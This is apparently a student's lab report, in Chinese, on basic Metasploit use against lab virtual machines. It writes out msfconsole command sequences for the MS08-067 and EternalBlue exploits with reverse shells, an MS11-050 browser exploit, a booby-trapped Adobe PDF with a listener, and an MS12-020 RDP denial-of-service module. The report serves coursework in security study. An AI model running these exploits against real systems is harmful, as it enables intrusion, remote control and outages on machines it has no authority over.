2018-2019 20165226 Exp5 MSF基础应用

你的名字 2022-01-07 13:59 235阅读 0赞

# 2018-2019 20165226 Exp5 MSF基础应用 #

##  ##

####  目录 ####

--------------------

一、实验内容说明及基础问题回答

二、实验过程

*   Task1 主动攻击实践
    
     *  ms08\_067
     *  ms17\_010
 *   Task2 针对浏览器的攻击
    
     *  ms11\_050
     *  browser\_autopwn（唯一，失败）
 *   Task3 对客户端的攻击，如Adobe
 *   Task4 成功应用auxiliary/dos/windows/rdp/ms12\_020\_maxchannelids模块（唯一）

三、问题与思考

四、实验总结

--------------------

####  一、实验内容说明及基础问题回答 ####

--------------------

1、实验内容  
本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成：  
（1） 一个主动攻击实践，如ms08\_067; （1分）

（2）一个针对浏览器的攻击，如ms11\_050；（1分）

（3） 一个针对客户端的攻击，如Adobe；（1分）

（4）成功应用任何一个辅助模块。（0.5分）

2、基础问题回答  
（1）用自己的话解释什么是 exploit , payload , encode.

*  exploit  
    渗透攻击模块，利用系统服务应用中的漏洞取得权限
 *  payload  
    一段代码，用于渗透之后在目标主机上执行
 *  encode  
    用来对payload进行编码，主要是为了避免“坏字符”和做到免杀

返回目录

--------------------

####  二、实验过程 ####

> 攻击机kali——172.30.2.47  
> 靶机：①WinXP——172.30.6.172②win2000——172.30.5.55

####  ####

Task1 主动攻击实践

#### ms08\_067 ####

*  在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

msf > use exploit/windows/smb/ms08_067_netapi
    
    msf exploit(ms08_067_netapi) > show payloads
    
    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
    
    msf exploit(ms08_067_netapi) > set LHOST 172.30.2.47 //攻击机ip
    
    msf exploit(ms08_067_netapi) > set LPORT 5226//攻击端口
    
    msf exploit(ms08_067_netapi) > set RHOST 172.30.6.172 //靶机ip，特定漏洞端口已经固定
    
    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型，匹配度较高
    
    msf exploit(ms08_067_netapi) > exploit //攻击

![1047870-20190409130830853-1961771941.png][]

*  结果出现无法创建会话界面  
    ![1047870-20190409130915688-257044040.png][]
 *  查看targets，与本机作对比  
    ![1047870-20190409131249100-1364885440.png][]
 *  通过网上查找资料，发现xp中文版本打过补丁，于是换了一台win2000的，攻击成功  
    ![1047870-20190409131648776-1434004229.png][]
 *  输入`ipconfig/all`，获取相关的MAC地址、IP地址、子网掩码、网关地址以及DNS  
    ![1047870-20190409131948922-971312417.png][]

####  ####

ms17\_010

> 攻击：kali  
> 靶机：①win2000②winxp③win2008

*  进入msfconsole
 *  输入以下指令

search ms17-010 #搜索漏洞
    use exploit/windows/smb/ms17_010_eternalblue    #选择漏洞
    show payloads   #查看可用攻击载荷
    set payload windows/x64/meterpreter/reverse_tcp #选择攻击载荷
    options

![1047870-20190410083819733-1354410653.png][]

*  再输入以下指令：

set RHOST 172.30.2.111 #设置攻击ip
    set LHOST 172.30.2.47   #设置监听主机
    set LPORT 5226  #设置监听端口

*  失败  
    ![1047870-20190410083943056-1324544571.png][]
 *  尝试更换虚拟机，终于，成功  
    ![1047870-20190410084207433-530988460.png][]

####  ####

Task2 针对浏览器的攻击

> 攻击机kali——172.30.2.47  
> 靶机：①Win2000②win2007

####  ####

ms11\_050

*  在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
    msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.2.47 //攻击机ip
    msf exploit(ms11_050_cobjectelement) > set LPORT 5226 //攻击端口固定
    msf exploit(ms11_050_cobjectelement) > set URIPATH 5226lxs //统一资源标识符路径设置
    msf exploit(ms11_050_cobjectelement) > exploit

![1047870-20190409133735789-1862726978.png][]

*  在浏览器输入`http://172.30.2.47:8080/5226lxs`，IE无法访问  
    ![1047870-20190409133601932-1744077502.png][]
 *  设置浏览器的安全级别如下  
    ![1047870-20190409133803414-649259516.png][]
 *  仍然不行，重新换一台虚拟机
 *  在设置Internet选项后仍是会出现IE浏览器的错误  
    ![1047870-20190409134452247-1393896188.png][]

####  ####

browser\_autopwn

*  换一个漏洞`实施browser_autopwn模块`
    
     *  攻击机里进入msfconsole，然后分别输入

use auxiliary/server/browser_autopwn2
    
    set SRVHOST 172.30.2.47
    
    set URIPATH auto
    
    show options

*  开始攻击，可以看到msf在不停的尝试不同的payload  
    ![1047870-20190409140909222-433084081.png][]
 *  尝试成功，输出了可被访问的URL`http：//172.30.2.47:8080/auto`并启动服务器  
    ![1047870-20190409143009014-798414348.png][]
 *  失败again  
    ![1047870-20190409143042776-351159830.png][]

####  ####

Task3 对客户端的攻击，如Adobe

*  在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

msf > use windows/fileformat/adobe_cooltype_sing
    
    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回连
    
    msf exploit(adobe_cooltype_sing) > set LHOST 172.30.2.47 //攻击机ip
    
    msf exploit(adobe_cooltype_sing) > set LPORT 5226//攻击端口
    
    msf exploit(adobe_cooltype_sing) > set FILENAME 20165226.pdf //设置生成pdf文件的名字
    
    msf exploit(adobe_cooltype_sing) > exploit //攻击

*  将生成的pdf文件拷贝到靶机上  
    ![1047870-20190409202542571-659214307.png][]
 *  在kali上输入`back`退出当前模块，进入监听模块，输入以下命令：

msf > use exploit/multi/handler //进入监听模块
    
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
    
    msf exploit(handler) > set LHOST 172.30.2.47 //攻击机ip
    
    msf exploit(handler) > set LPORT 5226 //攻击端口固定
    
    msf exploit(handler) > exploit

![1047870-20190409202838281-1508794294.png][]

*  在靶机上打开20165226.pdf文件  
    ![1047870-20190409203040372-1384410551.png][]
 *  攻击机显示攻击成功  
    ![1047870-20190409203102779-336271013.png][]
 *  靶机关闭PDF文件则失去权限  
    ![1047870-20190409203814041-1272949205.png][]

####  ####

Task4 成功应用auxiliary/dos/windows/rdp/ms12\_020\_maxchannelids模块（唯一）

> 攻击：kali  
> 靶机：win2008

*  使用命令`show auxiliary`查看所有的辅助模块
 *  使用`MS12-020(CVE-2012-0002)蓝屏攻击`
 *  进入`msfconsole`
 *  输入以下指令

search ms12-020 #搜索漏洞
    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids    #使用漏洞
    options #查看配置信息
    set RHOST 172.30.2.47 #设置攻击IP
    exploit #开始攻击

*  攻击成功  
    ![1047870-20190410084900875-2072885089.png][]

返回目录

--------------------

####  三、问题与思考 ####

*  问题1：在进行`ms08_067_netapi`攻击时出现以下情况  
    ![1047870-20190409131036803-1949453955.png][]
 *  问题1解决方案：
    
     *  首先查看targets  
        ![1047870-20190409131141798-245707037.png][]
     *  换另一台虚拟机，再次运行，攻击成功  
        ![1047870-20190409131653823-233610122.png][]

返回目录

####  四、实验总结 ####

本次实验学会了如何搜索漏洞，并在现有的漏洞环境下，尝试利用漏洞进行直接或间接主动攻击客户端。在整个过程中，其实找适合的虚拟机特别关键，整个过程耗费的时间大量集中在尝试不同虚拟机使其得以被攻击。不乏看出，打过补丁的虚拟机其抗攻击能力更强，这也提醒我们应时常更新配置。

返回目录

--------------------

转载于:https://www.cnblogs.com/musea/p/10673280.html

[1047870-20190409130830853-1961771941.png]: /images/20211220/a6dfac4f90ed487fa15589da2996ef20.png
[1047870-20190409130915688-257044040.png]: /images/20211220/3b6b71a4b24e4a77acf4868397bfd94b.png
[1047870-20190409131249100-1364885440.png]: /images/20211220/89f09958e46b421f9810bb761abc7b6e.png
[1047870-20190409131648776-1434004229.png]: /images/20211220/30554a0c53be4b778bdf3865a2b0aec9.png
[1047870-20190409131948922-971312417.png]: /images/20211220/63eae21f91824c689e8d1103404d0f01.png
[1047870-20190410083819733-1354410653.png]: /images/20211220/82283f6579f44eeab99e19f00b2b29a2.png
[1047870-20190410083943056-1324544571.png]: /images/20211220/5609cd3c73204d3498c675a0c4da5c87.png
[1047870-20190410084207433-530988460.png]: /images/20211220/8067967ad376468ca8f952af41843b5f.png
[1047870-20190409133735789-1862726978.png]: /images/20211220/2143f1a307c343b0aa81ef34cf43d906.png
[1047870-20190409133601932-1744077502.png]: /images/20211220/4f244906ae5c440c882af9b72d6c84f2.png
[1047870-20190409133803414-649259516.png]: /images/20211220/7fa7f586de6e4ab49136804b720fc5f4.png
[1047870-20190409134452247-1393896188.png]: /images/20211220/2fea9b7035b14ef9acdddd0c03d9bb78.png
[1047870-20190409140909222-433084081.png]: /images/20211220/a6797136e6ed4dca9f124698cf552292.png
[1047870-20190409143009014-798414348.png]: /images/20211220/4ad0731d1d37431bb402be2619e28f52.png
[1047870-20190409143042776-351159830.png]: /images/20211220/66d3fa77ccfc40d6ae8e45bae98c2399.png
[1047870-20190409202542571-659214307.png]: /images/20211220/a2a68dfe9f7547c4901df851d0798a8f.png
[1047870-20190409202838281-1508794294.png]: /images/20211220/9a1bffe4d2f1473485e2580fdbc1dafc.png
[1047870-20190409203040372-1384410551.png]: /images/20211220/1fcc73a8c3094bafa9756708a24b6bac.png
[1047870-20190409203102779-336271013.png]: /images/20211220/43f1a0015de64677a834229d9fe672d5.png
[1047870-20190409203814041-1272949205.png]: /images/20211220/eeeb2e58eb20471c91abafb7062fd9b6.png
[1047870-20190410084900875-2072885089.png]: /images/20211220/198b1a3c77d04bd5840b7f76fd76dd3a.png
[1047870-20190409131036803-1949453955.png]: /images/20211220/a1bf6e7548f04b3bbfd7242e83d6867f.png
[1047870-20190409131141798-245707037.png]: /images/20211220/3ab01bd97a7b435d9c69f462d48a4acf.png
[1047870-20190409131653823-233610122.png]: /images/20211220/47bba387309948a7868329f2192421d6.png